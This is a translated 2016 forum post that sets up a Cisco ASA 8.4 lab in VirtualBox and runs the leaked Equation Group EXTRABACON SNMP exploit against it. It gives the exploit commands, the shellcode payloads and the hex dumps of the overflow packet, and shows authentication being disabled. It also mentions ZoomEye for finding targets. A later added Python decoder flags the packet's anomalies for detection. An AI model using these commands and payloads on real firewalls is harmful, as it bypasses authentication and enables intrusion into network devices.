人=族 posted on 2016-9-26 12:11:18

Cisco (NSA Equation Group leak): exploit link attached

This post was last edited by 人=族 on 2016-9-30 23:51

I've spent the past few days looking into the EXTRABACON (EXBA) PoC from the Equation Group leak. I couldn't find a remote target online that it worked against, so I decided to build a local environment myself, and then I came across this article: http://www.freebuf.com/vuls/112589.html

It is the most helpful article I've read since the Equation Group leak. The awkward part is that the article reproduces the environment on Windows with VM, whereas my setup is Linux + VirtualBox (my Windows machine is only used for gaming and has no tools on it at all). After reading the article carefully, I went looking for a Linux + VirtualBox solution.

First, the virtual machine image files: http://l.0x48.pw/blackhat/ASA-8.4.zip

Unzip it; inside is an ASA-8.4.ovf, which can be imported directly with VirtualBox's "Import Appliance". By rights the VM should be usable straight after import, but nobody plays by the rules, so there are two things still to do, or really one thing: configure the network, and configuring the network requires connecting through the serial port. Connecting the serial port is shown in the figure below:
http://qn.lazysheep.cc/img/cisco1.png

The defaults are mostly fine; what matters is Path/Address: /tmp/gns3_vbox/5d5928d1-3cb9-46c6-85cb-b7e1121f188c. Fill in a path of your own here; it has to be in a directory VirtualBox can write to, so I chose /tmp. Then, to connect to the serial port on Ubuntu, I chose minicom:
$ sudo apt install minicom
$ sudo vim /etc/minicom/minirc.dfl
pu port            unix#/tmp/gns3_vbox/5d5928d1-3cb9-46c6-85cb-b7e1121f188c
# the path after unix# is the VirtualBox serial-port path from above
Next is starting the virtual machine, but there are a few issues to deal with before booting.
As shown:

http://qn.lazysheep.cc/img/cisco2.png
The larger disk must be the Master and set as the boot disk; after import, the 500 KB disk is the boot disk, so the VM cannot start.

Then the network: for your own testing a single NIC is enough, and I use host-only, as shown:
http://qn.lazysheep.cc/img/cisco3.png
http://qn.lazysheep.cc/img/cisco4.png
Now the VM can be powered on. After booting, choose ASA 8.42 to start; it will then stop at "Booting the kernel". Don't wait: however long you wait, it stays on that screen (when I first fumbled through this I stupidly waited half an hour). At this point you can use minicom to connect to the ASA's serial port.
$ sudo minicom
After a moment you get the firewall's terminal.

ciscoasa>en
Password:
ciscoasa#show run
......
interface GigabitEthernet0
shutdown
no nameif
no security-level
no ip address
!
......
Looking at the configuration, you'll find that the DHCP configured on the VirtualBox host-only network does nothing for this firewall, so a static IP has to be configured.

Since I set the VirtualBox host-only NIC above to 192.168.56.1, I'll give the firewall 192.168.56.150.

ciscoasa# conf ter
ciscoasa(config)#

***************************** NOTICE *****************************

Help to improve the ASA platform by enabling anonymous reporting,
which allows Cisco to securely receive minimal error and health
information from the device. To learn more about this feature,
please visit: http://www.cisco.com/go/smartcall

Would you like to enable anonymous error reporting to help improve
the product? [Y]es, [N]o, [A]sk later: y

Enabling anonymous reporting.
Adding "call-home reporting anonymous" to running configuration...
Creating trustpoint "_SmartCallHome_ServerCA" and installing certificate...

Trustpoint '_SmartCallHome_ServerCA' is a subordinate CA and holds a non self-s.

Trustpoint CA certificate accepted.

Please remember to save your configuration.

ciscoasa(config)# int G0
ciscoasa(config-if)# ip address 192.168.56.150 255.255.255.0
ciscoasa(config-if)# nameif inside
ciscoasa(config-if)# no shut
ciscoasa(config-if)# exit
ciscoasa(config)# exit
ciscoasa# show run
......
interface GigabitEthernet0
nameif inside
security-level 100
ip address 192.168.56.150 255.255.255.0
......
The IP is configured; now try a ping.

ciscoasa# ping 192.168.56.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.56.1, timeout is 2 seconds:
?????
Success rate is 0 percent (0/5)
It fails (GG); a reboot is needed.

ciscoasa# copy running-config startup-config

Source filename ?
Cryptochecksum: 7ab821ac df1697e5 257673c1 49832288

5670 bytes copied in 0.20 secs
Then power off and restart (or is there something like /etc/init.d/networking restart on Linux? No idea, so I went for the simple and direct hard restart).

Then ping the host to check that the network is up:

ciscoasa> ping 192.168.56.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.56.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms
Next, enable the services. According to the vulnerability description, the firewall must have SSH/Telnet and SNMP enabled; the SNMP vulnerability then allows logging in over SSH/Telnet without a password. By default these services are disabled, so we have to enable them manually.

# enable the telnet service, allowing any host to connect
ciscoasa(config)# telnet 0.0.0.0 0.0.0.0 inside
# enable the snmp service, allowing host 192.168.56.1 to connect
ciscoasa(config)# snmp-server host inside 192.168.56.1 community public
Check that they are enabled:

$ nmap 192.168.56.150 -p23 -Pn

Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-01 14:34 CST
Nmap scan report for 192.168.56.150
Host is up (0.00024s latency).
PORT   STATE SERVICE
23/tcp open  telnet

Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds

$ sudo nmap 192.168.56.150 -p161 -sU

Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-01 14:36 CST
Nmap scan report for 192.168.56.150
Host is up (0.00020s latency).
PORT    STATE SERVICE
161/udp open  snmp
MAC Address: 08:00:27:89:2B:96 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.82 seconds
Then try hitting it with the leaked Equation Group PoC:

$ python extrabacon_1.1.0.1.py info -t 192.168.56.150 -c public
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /EXPLOITS/EXBA/concernedparent
[+] Executing:extrabacon_1.1.0.1.py info -t 192.168.56.150 -c public
[+] probing target via snmp
[+] Connecting to 192.168.56.150:161
****************************************
[+] response:
###[ SNMP ]###
version   = <ASN1_INTEGER>
community = <ASN1_STRING['public']>
\PDU       \
   |###[ SNMPresponse ]###
   |id      = <ASN1_INTEGER>
   |error   = <ASN1_INTEGER>
   |error_index= <ASN1_INTEGER>
   |\varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |value   = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>
   |   |value   = <ASN1_TIME_TICKS>
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>
   |   |value   = <ASN1_STRING['ciscoasa']>

[+] firewall uptime is 93000 time ticks, or 0:15:30

[+] firewall name is ciscoasa

[+] target is running asa842, which is supported
Data stored in key file: asa842
Data stored in self.vinfo: ASA842

To check the key file to see if it really contains what we're claiming:
# cat /EXPLOITS/EXBA/keys/dc9d0q.key

To disable password checking on target:
# extrabacon_1.1.0.1.py exec -k dc9d0q -t 192.168.56.150 -c public --mode pass-disable

To enable password checking on target:
# extrabacon_1.1.0.1.py exec -k dc9d0q -t 192.168.56.150 -c public --mode pass-enable
The first step is host information probing; next comes the attack itself, whose effect is that Telnet/SSH can connect to the firewall without a password:

$ telnet 192.168.56.150
Trying 192.168.56.150...
Connected to 192.168.56.150.
Escape character is '^]'.


User Access Verification

Password:
Password:
Password: Connection closed by foreign host.
First, look at the state before the attack: no login is possible.

$ python extrabacon_1.1.0.1.py exec -k dc9d0q -t 192.168.56.150 -c public --mode pass-disable
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /EXPLOITS/EXBA/concernedparent
[+] Executing:extrabacon_1.1.0.1.py exec -k dc9d0q -t 192.168.56.150 -c public --mode pass-disable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-disable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-disable
appended PMCHECK_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
appended AAAADMINAUTH_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
[+] random SNMP request-id 527684062
[+] fixing offset to payload 50
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.50.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c3
EXBA msg (370):
[+] Connecting to 192.168.56.150:161
[+] packet 1 of 1
[+] 0000   30 82 01 6E 02 01 01 04 06 70 75 62 6C 69 63 A5   0..n.....public.
[+] 0010   82 01 5F 02 04 1F 73 D1 DE 02 01 00 02 01 01 30   .._...s........0
[+] 0020   82 01 4F 30 81 91 06 07 2B 06 01 02 01 01 01 04   ..O0....+.......
[+] 0030   81 85 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8 BB A5   ............1...
[+] 0040   25 F6 AC 31 FB B9 A5 B5 A5 A5 31 F9 BA A2 A5 A5   %..1......1.....
[+] 0050   A5 31 FA CD 80 EB 14 BF F0 8F 53 09 31 C9 B1 04   .1........S.1...
[+] 0060   FC F3 A4 E9 0C 00 00 00 5E EB EC E8 F8 FF FF FF   ........^.......
[+] 0070   31 C0 40 C3 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8   1.@...........1.
[+] 0080   BB A5 B5 AD AD 31 FB B9 A5 B5 A5 A5 31 F9 BA A2   .....1......1...
[+] 0090   A5 A5 A5 31 FA CD 80 EB 14 BF E0 13 08 08 31 C9   ...1..........1.
[+] 00a0   B1 04 FC F3 A4 E9 0C 00 00 00 5E EB EC E8 F8 FF   ..........^.....
[+] 00b0   FF FF 31 C0 40 C3 C3 30 81 B8 06 81 B3 2B 06 01   ..1.@..0.....+..
[+] 00c0   04 01 09 09 83 6B 01 03 03 01 01 05 09 5F 81 38   .....k......._.8
[+] 00d0   43 7B 7A 81 2D 35 81 25 81 25 81 25 81 25 81 03   C{z.-5.%.%.%.%..
[+] 00e0   81 6C 04 81 09 04 24 81 09 81 65 81 03 81 45 48   .l....$...e...EH
[+] 00f0   31 81 40 31 81 5B 81 33 10 31 81 76 81 3F 81 2E   1.@1.[.3.1.v.?..
[+] 0100   81 2A 81 2A 81 2A 81 01 81 77 81 25 81 25 81 25   .*.*.*...w.%.%.%
[+] 0110   81 25 60 81 0B 81 04 24 81 60 01 00 00 04 32 81   .%`....$.`....2.
[+] 0120   7F 81 50 61 81 43 81 10 81 10 81 10 81 10 81 10   ..Pa.C..........
[+] 0130   81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10   ................
[+] 0140   81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10   ................
[+] 0150   81 10 81 10 81 10 81 10 81 10 81 10 81 10 19 47   ...............G
[+] 0160   14 09 81 0B 7C 24 14 81 0B 07 81 7F 81 60 81 10   ....|$.......`..
[+] 0170   05 00                                              ..
****************************************
[+] response:
###[ SNMP ]###
version   = <ASN1_INTEGER>
community = <ASN1_STRING['public']>
\PDU       \
   |###[ SNMPresponse ]###
   |id      = <ASN1_INTEGER>
   |error   = <ASN1_INTEGER>
   |error_index= <ASN1_INTEGER>
   |\varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |value   = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.112.117.98.108.105.99.46.49.57.50.46.49.54.56.46.53.54.46.49.46.50']>
   |   |value   = <ASN1_STRING['']>
[+] received SNMP id 527684062, matches random id sent, likely success
[+] clean return detected
Then try logging in with telnet:

$ telnet 192.168.56.150
Trying 192.168.56.150...
Connected to 192.168.56.150.
Escape character is '^]'.


User Access Verification

Password:
Type help or '?' for a list of available commands.
ciscoasa> en
Password:
ciscoasa# conf ter
ciscoasa(config)#
Attack successful.
From the environment-setup process above, let's briefly analyze the conditions of this vulnerability:

SNMP and SSH/Telnet must be enabled, and on the firewall they are disabled by default.
SNMP is enabled through a whitelist, and only a single IP can be specified, not an entire subnet:
ciscoasa(config)# snmp-server host inside 0.0.0.0 community public
ERROR: Not a valid host address - 0.0.0.0
ciscoasa(config)# snmp-server host inside 192.168.56.0 community public
$ sudo nmap 192.168.56.150 -p161 -sU

Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-01 15:07 CST
Nmap scan report for 192.168.56.150
Host is up (0.00018s latency).
PORT    STATE         SERVICE
161/udp open|filtered snmp
MAC Address: 08:00:27:89:2B:96 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.85 seconds
ciscoasa(config)# snmp-server host inside 192.168.56.0 255.255.255.0 community$

snmp-server host inside 192.168.56.0 255.255.255.0 community public
                                     ^
ERROR: % Invalid input detected at '^' marker.
ciscoasa(config)# snmp-server host inside 192.168.56.0/24 community public
                                                      ^
ERROR: % Invalid input detected at '^' marker.
As you can see, because a subnet mask cannot be set there is no way to enter a network address at all; only a single IP can be entered.

The SNMP community authentication issue: public is the authentication string we set; say we change it:
ciscoasa(config)# snmp-server host inside 192.168.56.1 community public-test
$ python extrabacon_1.1.0.1.py info -t 192.168.56.150 -c public
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /EXPLOITS/EXBA/concernedparent
[+] Executing:extrabacon_1.1.0.1.py info -t 192.168.56.150 -c public
[+] probing target via snmp
[+] Connecting to 192.168.56.150:161
****************************************
Traceback (most recent call last):
$ python extrabacon_1.1.0.1.py info -t 192.168.56.150 -c public-test
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /EXPLOITS/EXBA/concernedparent
[+] Executing:extrabacon_1.1.0.1.py info -t 192.168.56.150 -c public-test
[+] probing target via snmp
[+] Connecting to 192.168.56.150:161
****************************************
[+] response:
###[ SNMP ]###
version   = <ASN1_INTEGER>
community = <ASN1_STRING['public-test']>
\PDU       \
   |###[ SNMPresponse ]###
   |id      = <ASN1_INTEGER>
   |error   = <ASN1_INTEGER>
   |error_index= <ASN1_INTEGER>
   |\varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |value   = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>
   |   |value   = <ASN1_TIME_TICKS>
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>
   |   |value   = <ASN1_STRING['ciscoasa']>

[+] firewall uptime is 150100 time ticks, or 0:25:01

[+] firewall name is ciscoasa

[+] target is running asa842, which is supported
Data stored in key file: asa842
Data stored in self.vinfo: ASA842

To check the key file to see if it really contains what we're claiming:
# cat /EXPLOITS/EXBA/keys/OpezI1.key

To disable password checking on target:
# extrabacon_1.1.0.1.py exec -k OpezI1 -t 192.168.56.150 -c public-test --mode pass-disable

To enable password checking on target:
With a wrong community string, SNMP cannot be reached at all.

The three conditions above make this vulnerability a very impractical RCE: first you need to be able to reach SNMP, reaching SNMP requires being on the firewall's whitelist, and then you also need to know the community authentication string.

Search tool: https://www.zoomeye.org

Exploit tool: **** Hidden Message *****
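Added example, not part of the original post or of the leaked tool: a small BER/SNMP decoder run over the 370-byte request reproduced in the post's hex dump. It recovers the request-id (527684062, matching the "random SNMP request-id" line above), the community string, and both varbinds, and then flags what makes the request stand out to a defender: a 112-arc OID under the Cisco subtree 1.3.6.1.4.1.9.9.491 and a 133-byte OCTET STRING carried as the value of a GetBulk varbind, where a read request would normally carry NULL. The thresholds MAX_NORMAL_ARCS and MAX_NORMAL_VALUE_LEN are assumptions chosen for this example, and BENIGN_GET_HEX is a constructed ordinary GetRequest for sysDescr.0 used for comparison; neither comes from the post.

```python
"""Decode an SNMP request and flag the anomalies visible in the post's hex dump."""
import re

# Cisco subtree the post's 112-arc overflow OID lives under.
CISCO_SUBTREE = [1, 3, 6, 1, 4, 1, 9, 9, 491]
MAX_NORMAL_ARCS = 20          # assumption: legitimate OIDs under that subtree are far shorter
MAX_NORMAL_VALUE_LEN = 32     # assumption: Get/GetNext/GetBulk varbinds normally carry NULL
READ_PDU_TAGS = {0xA0, 0xA1, 0xA5}   # GetRequest, GetNextRequest, GetBulkRequest

# The 370-byte request from the post's hex dump (offsets and ASCII column dropped).
SAMPLE_PACKET_HEX = """
30 82 01 6E 02 01 01 04 06 70 75 62 6C 69 63 A5 82 01 5F 02 04 1F 73 D1 DE 02 01 00 02 01 01 30
82 01 4F 30 81 91 06 07 2B 06 01 02 01 01 01 04 81 85 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8 BB A5
25 F6 AC 31 FB B9 A5 B5 A5 A5 31 F9 BA A2 A5 A5 A5 31 FA CD 80 EB 14 BF F0 8F 53 09 31 C9 B1 04
FC F3 A4 E9 0C 00 00 00 5E EB EC E8 F8 FF FF FF 31 C0 40 C3 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8
BB A5 B5 AD AD 31 FB B9 A5 B5 A5 A5 31 F9 BA A2 A5 A5 A5 31 FA CD 80 EB 14 BF E0 13 08 08 31 C9
B1 04 FC F3 A4 E9 0C 00 00 00 5E EB EC E8 F8 FF FF FF 31 C0 40 C3 C3 30 81 B8 06 81 B3 2B 06 01
04 01 09 09 83 6B 01 03 03 01 01 05 09 5F 81 38 43 7B 7A 81 2D 35 81 25 81 25 81 25 81 25 81 03
81 6C 04 81 09 04 24 81 09 81 65 81 03 81 45 48 31 81 40 31 81 5B 81 33 10 31 81 76 81 3F 81 2E
81 2A 81 2A 81 2A 81 01 81 77 81 25 81 25 81 25 81 25 60 81 0B 81 04 24 81 60 01 00 00 04 32 81
7F 81 50 61 81 43 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10
81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 19 47
14 09 81 0B 7C 24 14 81 0B 07 81 7F 81 60 81 10 05 00
"""

# Constructed for comparison: a plain SNMPv2c GetRequest for sysDescr.0 (1.3.6.1.2.1.1.1.0).
BENIGN_GET_HEX = """
30 29 02 01 01 04 06 70 75 62 6C 69 63 A0 1C 02 04 00 00 00 01
02 01 00 02 01 00 30 0E 30 0C 06 08 2B 06 01 02 01 01 01 00 05 00
"""


def hex_to_bytes(text):
    return bytes.fromhex(re.sub(r"[^0-9A-Fa-f]", "", text))


def read_tlv(buf, pos):
    """Return (tag, content, next_pos) for the BER element starting at buf[pos]."""
    tag, first, pos = buf[pos], buf[pos + 1], pos + 2
    if first < 0x80:                 # short-form length
        length = first
    else:                            # long form: 0x8N followed by N length bytes
        n = first & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:end], end


def decode_oid(content):
    """Base-128 decode an OBJECT IDENTIFIER body into its list of arcs."""
    arcs, value = [], 0
    for byte in content:
        value = (value << 7) | (byte & 0x7F)
        if not byte & 0x80:          # last byte of this sub-identifier
            if not arcs:             # the first sub-identifier packs arcs 1 and 2
                arcs.extend(divmod(value, 40) if value < 80 else (2, value - 80))
            else:
                arcs.append(value)
            value = 0
    return arcs


def parse_snmp(packet):
    """Parse an SNMPv1/v2c message into version, community, PDU type, request-id and varbinds."""
    _, msg, _ = read_tlv(packet, 0)
    _, version, pos = read_tlv(msg, 0)
    _, community, pos = read_tlv(msg, pos)
    pdu_tag, pdu, _ = read_tlv(msg, pos)
    _, request_id, pos = read_tlv(pdu, 0)
    _, _, pos = read_tlv(pdu, pos)   # error-status (non-repeaters for GetBulk)
    _, _, pos = read_tlv(pdu, pos)   # error-index (max-repetitions for GetBulk)
    _, vb_list, _ = read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vb_list):
        _, vb, pos = read_tlv(vb_list, pos)
        _, oid, value_pos = read_tlv(vb, 0)
        value_tag, value, _ = read_tlv(vb, value_pos)
        varbinds.append((decode_oid(oid), value_tag, value))
    return {"version": int.from_bytes(version, "big"),
            "community": community.decode("latin-1"),
            "pdu_tag": pdu_tag,
            "request_id": int.from_bytes(request_id, "big", signed=True),
            "varbinds": varbinds}


def extrabacon_indicators(packet):
    """Return human-readable findings for a request; an empty list means nothing odd."""
    msg = parse_snmp(packet)
    findings = []
    for arcs, value_tag, value in msg["varbinds"]:
        if arcs[:len(CISCO_SUBTREE)] == CISCO_SUBTREE and len(arcs) > MAX_NORMAL_ARCS:
            findings.append(f"oversized OID under 1.3.6.1.4.1.9.9.491 ({len(arcs)} arcs)")
        if msg["pdu_tag"] in READ_PDU_TAGS and value_tag != 0x05 and len(value) > MAX_NORMAL_VALUE_LEN:
            findings.append(f"{len(value)}-byte value in a read request for {'.'.join(map(str, arcs))}")
    return findings


if __name__ == "__main__":
    for name, hex_text in (("post's packet", SAMPLE_PACKET_HEX), ("benign GetRequest", BENIGN_GET_HEX)):
        packet = hex_to_bytes(hex_text)
        print(name, parse_snmp(packet)["request_id"], extrabacon_indicators(packet) or "no findings")
```

The same two checks (OID length under the Cisco subtree, and non-NULL values in read requests) are what an IDS rule or a SNMP-aware log filter would key on; anything in the 192.168.56.0/24 lab can be replayed through this decoder from a pcap by feeding it the UDP payload bytes.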


90_ posted on 2016-9-26 18:05:22

This gives me a headache to read. Don't you know how to use code tags?

H.U.C-Star posted on 2016-9-26 21:21:32

Awesome. Couldn't you start from the basics and work up? Whatever, here are 30 coins for you!

年轻的小老头儿 posted on 2016-10-19 13:48:10

Thanks for sharing, OP.

庐阳小马 posted on 2017-1-12 09:52:02

Exhausting to read, my brain hurts.